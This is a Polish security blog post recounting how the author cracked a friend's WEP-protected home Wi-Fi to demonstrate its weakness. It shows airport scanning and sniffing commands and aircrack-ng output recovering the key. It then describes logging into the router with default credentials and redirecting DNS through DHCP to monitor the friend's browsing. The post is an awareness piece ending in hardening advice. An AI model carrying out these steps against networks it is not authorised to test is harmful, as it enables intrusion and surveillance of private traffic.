NFsec Logo

Historia pewnego włamania #2

16/01/2015 w Ataki Internetowe Brak komentarzy.  (artykuł nr 470, ilość słów: 1050)

K

iedyś ku mojemu zdziwieniu prosząc znajomego o udostępnienie WiFi zobaczyłem, że używa jeszcze szyfrowania typu WEP. Po serii epitetów o mądrości tego rozwiązania – otrzymałem odpowiedź, że przy innych formach szyfrowania ma bardzo słaby zasięg na drugim piętrze swojego mieszkania, a z tym przynajmniej działa mu w miarę płynnie Internet i poza tym, kto by się trudził w jakieś tam łamanie szyfru i inne afery szpiegowskie. Pozwoliłem sobie zademonstrować mu ile trudu trzeba włożyć, aby zacząć korzystać z jego sieci domowej oznajmiając, że sam podłącze się do jego routera bez jego pomocy.

Na początek zobaczyłem jakie inne sieci są w pobliżu oraz na jakim dokładnie kanale nasłuchuje jego router:

[agresor@ironhide ~]$ airport -s
                            SSID BSSID             RSSI CHANNEL HT CC SECURITY
               multimedia_f77e99 54:be:f7:58:55:85 -81  11      Y  -- WPA2
                    NETIA-03c9cd f4:3e:61:03:c7:cc -80  11      N  -- WPA
                         D010835 00:24:d1:c8:a9:08 -82  11      N  -- WPA
                             DST 9e:a9:e4:1b:b9:46 -74  10      Y  PL WPA
                            HOME 80:1f:02:4a:19:41 -77  8       N  -- WEP
         FON_NETIA_FREE_INTERNET 00:12:2a:c3:41:5a -73  1       Y  PL NONE
                NETIASPOT-C34251 00:12:2a:c3:41:58 -73  1       Y  PL WPA

Jest. Sieć HOME (której nazwę mi wcześniej podał) oraz kanał 8. Każdy kto chociaż raz przeczytał lub przetrenował tego typu scenariusz wie, że teraz wystarczy przełączyć kartę WiFi w tryb nasłuchu na danym kanale i czekać na wystarczającą ilość pakietów:

[agresor@ironhide ~]$ sudo airport en1 sniff 8
Password:
Capturing 802.11 frames on en1.

Oczywiście pozwoliłem sobie przyśpieszyć cały proces poprzez prośbę, aby w między czasie na swoim komputerze ściągnął pakiet OpenOffice. Kiedy plik z pakietami (/tmp/airportSniff02hwXg.cap) osiągnął wystarczający rozmiar paru giga przerwałem proces, aby sprawdzić czy posiadam już wystarczającą ilość danych. Ponieważ używam MacPortsów znacznie wcześniej miałem poinstalowane różne narzędzia z gałęzi /security w tym aircrack-ng. Ściąganie OpenOffice zajęło kilka minut, a złamanie klucza kilka sekund:

[agresor@ironhide ~]$ aircrack-ng -a 1 -b 80:1f:02:4a:19:41 /tmp/airportSniff02hwXg.cap

 Aircrack-ng 1.1
 [00:00:07] Tested 2044722 keys (got 893193 IVs)

   KB    depth   byte(vote)
    0    0/  1   54(1182464) 61(948736) 48(940032) 16(930048) 5F(927232) 63(925952) 
    1    0/  1   61(1229568) 6A(927488) 91(927232) E1(926720) AE(925696) 83(925696) 
    2    0/  1   6A(1203712) 7F(941056) 9C(936704) 3A(934144) AB(932864) A4(928768) 
    3    0/  1   6E(1198080) E8(932864) C3(929280) C1(926720) 94(923904) 68(923648) 
    4    0/  1   65(1190912) 01(949504) 6F(926464) 13(926208) 84(923136) 9F(921856)
    5    0/  1   31(1194752) F2(929536) F4(926976) 8D(926464) 63(926208) 98(924928) 
    6    0/  1   39(1198080) B6(939520) 40(937984) 71(930304) 78(929536) 72(924928) 
    7    0/  1   39(1167616) 6A(945408) FF(933632) AA(925952) A7(924672) D3(923904) 
    8    0/  1   33(1179648) 3E(934912) 5C(928512) C4(928000) 2B(927232) B8(923392) 
    9    0/ 32   30(944384) 50(931328) 35(929280) 97(929024) F9(928256) 20(927232) 
   10    0/  1   33(946688) 5C(942848) C3(935936) 6C(923904) 61(921856) 29(921600) 

KEY FOUND! [ 54:61:6A:6E:65:31:39:39:33:30:33 ] (ASCII: Tajne199303 )
Decrypted correctly: 100%

Mina kolegi już nie była tak wyrozumiała dla całej sytuacji. Pragnąc dodać trochę dramatyzmu do całej sytuacji sprawdziłem producenta routera oraz adres bramy:

[agresor@ironhide ~]$ netstat -nr
Routing tables

Internet:
Destination        Gateway            Flags        Refs      Use   Netif Expire
default            192.168.1.1        UGSc           35        0     en1

Widząc, że będę miał do czynienia z routerem firmy Edimax łatwo odnalazłem standardowe dane autoryzacyjne. Dość prozaiczne – jednak w 90% skuteczne, ze względu na lenistwo użytkowników. Dalej już poszło z górki. Na swoim komputerze postawiłem na szybko serwer DNS typu cache z pełnym logowaniem zapytań (unbound), a na routerze zmieniłem ustawienia serwera DHCP tak, aby przyznawał serwer DNS z mojego komputera. Przy kolejnym podłączeniu do sieci domowej – adresy, które znajomy wpisywał w swojej przeglądarce mógł również oglądać na moim komputerze. Tego samego dnia zostały zmienione: szyfr, hasło klucza, login i hasło do konta administratora, a anteny routera zostały wzmocnione dość tanim kosztem.

Więcej informacji: The Most Important Security Settings to Change on Your Router

Kategorie K a t e g o r i e : Ataki Internetowe

Tagi T a g i : , , , , , , , , , ,

Zostaw odpowiedź.

Musisz być zalogowany by móc komentować.